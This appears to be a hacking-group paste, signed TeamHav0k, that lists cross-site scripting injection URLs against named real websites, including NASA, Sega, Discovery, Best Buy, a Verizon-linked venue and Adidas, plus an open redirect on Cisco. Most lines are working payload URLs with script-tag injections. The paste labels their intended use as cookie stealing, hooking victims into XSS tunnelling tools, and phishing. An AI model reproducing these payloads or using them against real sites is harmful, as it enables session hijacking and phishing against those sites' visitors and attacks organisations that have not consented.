TeamHav0k -High Profile XSS+Redirect Vulns-

1. -TeamHav0k-
2.  
3. We just got bored and started searching around for XSS, we found a few and a Cisco redirect vuln. Some targets include: NASA, Sega, verizon, Cisco.
4. ----------
5.  
6. Target: Sega.com
7. http://us.download-shop.sega.com/search.html
8. Syntax: In searchbar type "/><script>alert(1)</script>
9. Danger Level: Low
10. Usage: non
11.  
12. Target: Discovery.com
13. http://animal.discovery.com/search/results.html?focus=site&query=</TITLE><SCRIPT>alert("XSS");</SCRIPT>&search=+
14. Danger Level: High
15. Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF victims.
16.  
17. Target: Bestbuy.com
18. http://bestbuytheater.com/eventdetail.php?id=30563'"><script>alert('1')</script>
19. Danger Level: High
20. Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF victims.
21.  
22. Target: Verizon.com
23. http://verizontheatre.com/events/eventdetail.php?id=31557</script>'"><script>alert('1')</script>
24. Danger Level: High
25. Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
26.  
27. Target: NASA.gov
28. http://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=<script>alert('1')</script>
29. http://technologygateway.nasa.gov/index.cfm?fuseaction="><script>alert('1')</script>
30. http://spaceflight.nasa.gov/cgi-bin/acronyms.cgi
31. searchdata=<script>alert(1)</script>&submit=Search&program=shuttle&searchall=false
32. Dange Level: High
33. Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
34.  
35. Target: adidas.com
36. catalogue.adidas.com/catalogue/ae/products/?keywords="; alert(1); test="test
37. Dange Level: High
38. Usage: Cookie Stealing, Claiming XSS Tunnel/XSSF Victims.
39.  
40. Target: Cisco.com
41. http://www.cisco.com/survey/exit.html?http://twitter.com/
42. Danger Level: High
43. Usage: Phishing.